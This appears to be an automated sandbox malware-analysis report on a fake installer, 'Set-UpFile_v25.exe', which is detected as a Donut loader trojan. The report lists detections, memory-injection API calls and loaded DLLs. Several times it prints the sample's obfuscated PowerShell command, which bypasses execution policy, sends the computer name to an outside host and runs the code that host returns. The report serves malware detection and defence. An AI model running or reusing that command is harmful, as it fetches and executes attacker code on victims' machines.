            Source: unknownHTTPS traffic detected: 104.21.25.52:443 -> 192.168.2.4:49757 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49758 version: TLS 1.2

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_029D2D35 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,CreateThread,0_2_029D2D35
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_029803750_2_02980375
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_029D2D350_2_029D2D35
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_029A42920_2_029A4292
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_0299C2A20_2_0299C2A2
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_029C4AA20_2_029C4AA2
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_029BE2C20_2_029BE2C2
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_0298B2C20_2_0298B2C2
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_0299F2C20_2_0299F2C2
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_02985AF20_2_02985AF2
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_029ABA130_2_029ABA13
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_0299EA340_2_0299EA34
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_0298A2520_2_0298A252
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_029B03920_2_029B0392
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_029BCBC20_2_029BCBC2
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_0299A3F00_2_0299A3F0
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_029963E20_2_029963E2
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_0298F3380_2_0298F338
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_029873520_2_02987352
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_029A3B420_2_029A3B42
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_029ACB680_2_029ACB68
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_029843620_2_02984362
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_029928C90_2_029928C9
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_0299E0FA0_2_0299E0FA
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_0298C8E20_2_0298C8E2
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_029AD8110_2_029AD811
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_029AA8720_2_029AA872
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_029BE8620_2_029BE862
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_029881A20_2_029881A2
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_029AC9F20_2_029AC9F2
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_0299D9550_2_0299D955
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_029851420_2_02985142
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_0299A9610_2_0299A961
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_0299EEB20_2_0299EEB2
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_0299F6C20_2_0299F6C2
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_029A966A0_2_029A966A
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_02988F820_2_02988F82
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_029A1F800_2_029A1F80
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_0299BFC20_2_0299BFC2
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_029C47F20_2_029C47F2
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_029847420_2_02984742
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_029987440_2_02998744
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_029C0F720_2_029C0F72
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_029934B70_2_029934B7
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_02993CCF0_2_02993CCF
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_0299C4EB0_2_0299C4EB
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_029B34120_2_029B3412
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_02990C220_2_02990C22
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_0299B4420_2_0299B442
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_029C44420_2_029C4442
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_029A75D20_2_029A75D2
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_0298ADD20_2_0298ADD2
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_0299FDC20_2_0299FDC2
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_029C4DE20_2_029C4DE2
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_02987D120_2_02987D12
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_029BD5220_2_029BD522
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_0298A5420_2_0298A542
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: String function: 02989B12 appears 66 times
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: String function: 029963D2 appears 38 times
            Source: Set-UpFile_v25.exeStatic PE information: invalid certificate
            Source: Set-UpFile_v25.exeStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
            Source: Set-UpFile_v25.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
            Source: Set-UpFile_v25.exe, 00000000.00000003.1767448797.000000000307A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs Set-UpFile_v25.exe
            Source: Set-UpFile_v25.exe, 00000000.00000000.1659588874.000000000051F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs Set-UpFile_v25.exe
            Source: Set-UpFile_v25.exeBinary or memory string: OriginalFilenameshfolder.dll~/ vs Set-UpFile_v25.exe
            Source: Set-UpFile_v25.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
            Source: 00000000.00000002.1964396889.0000000002980000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/3@4/2
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_02980A85 CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,0_2_02980A85
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7604:120:WilError_03
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1unjy0zf.ro1.ps1Jump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Set-UpFile_v25.exe, 00000000.00000003.1793222380.0000000003675000.00000004.00000800.00020000.00000000.sdmp, Set-UpFile_v25.exe, 00000000.00000003.1792659491.00000000036A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Set-UpFile_v25.exeString found in binary or memory: -Helper process exited with failure code: 0x%x
            Source: Set-UpFile_v25.exeString found in binary or memory: -HelperRegisterTypeLibrary: StatusCode invalidU
            Source: Set-UpFile_v25.exeString found in binary or memory: /LoadInf=
            Source: Set-UpFile_v25.exeString found in binary or memory: /InstallOnThisVersion: Invalid MinVersion string
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeFile read: C:\Users\user\Desktop\Set-UpFile_v25.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Set-UpFile_v25.exe "C:\Users\user\Desktop\Set-UpFile_v25.exe"
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Jump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeSection loaded: msimg32.dllJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: Set-UpFile_v25.exeStatic file information: File size 75060322 > 1048576
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb= source: powershell.exe, 00000004.00000002.1981590560.0000000006D97000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1981135607.0000000006D0A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1981556253.0000000006D85000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000004.00000002.1981590560.0000000006D97000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbl source: powershell.exe, 00000004.00000002.1981556253.0000000006D85000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Suspicious powershell command line found
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Jump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeCode function: 0_2_02995E52 push ebx; retn 0002h0_2_02995E5C
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06F81B1D push esp; iretd 4_2_06F81BBD
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06F81AE4 push ebp; iretd 4_2_06F81AEA
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06F81DDF push edx; iretd 4_2_06F81DE5
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06F81D79 push ebx; iretd 4_2_06F81D7F
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06F81D5A push ebx; iretd 4_2_06F81D60
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06F81D21 push ebx; iretd 4_2_06F81D27
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Set-UpFile_v25.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
